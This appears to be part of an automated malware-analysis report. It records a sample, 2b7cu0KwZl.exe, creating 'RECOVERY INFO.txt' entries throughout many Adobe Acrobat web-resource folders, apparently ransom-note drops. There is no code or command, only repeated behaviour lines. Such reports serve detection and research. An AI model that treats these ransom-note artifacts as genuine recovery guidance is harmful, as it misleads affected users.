Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\root\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\sv-se\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\ccpdf\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\cpdf\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\epdf\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\images\themeless\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\ca-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\cs-cz\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\da-dk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\de-de\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-ae\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-il\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\es-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\eu-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\fi-fi\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\fr-fr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\fr-ma\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\hr-hr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\hu-hu\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\it-it\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\ja-jp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\ko-kr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\nb-no\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\nl-nl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\pl-pl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\pt-br\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\ro-ro\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\root\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\ru-ru\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\sk-sk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\sl-si\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\sv-se\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\tr-tr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\uk-ua\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\zh-cn\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\zh-tw\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\images\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ca-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\cs-cz\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\da-dk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\de-de\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-ae\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-il\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\es-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\eu-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fi-fi\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fr-fr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fr-ma\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hr-hr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hu-hu\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\it-it\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ja-jp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ko-kr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nb-no\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nl-nl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pl-pl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pt-br\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ro-ro\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\root\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ru-ru\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sk-sk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sl-si\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sv-se\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\tr-tr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\uk-ua\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-cn\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-tw\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\plugins\rhp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ca-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\cs-cz\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\da-dk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\de-de\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-ae\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-il\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\es-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\eu-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fi-fi\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fr-fr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fr-ma\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\hr-hr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\hu-hu\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\it-it\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ja-jp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ko-kr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\nb-no\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\nl-nl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pl-pl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pt-br\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ro-ro\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\root\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ru-ru\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sk-sk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sl-si\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sv-se\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\tr-tr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\uk-ua\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-cn\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-tw\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\plugins\rhp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\dc-annotations\js\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ca-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\cs-cz\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\da-dk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\de-de\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-ae\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-gb\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-il\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\es-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\eu-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fi-fi\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fr-fr\RECOVERY INFO.txt	Jump to behavior
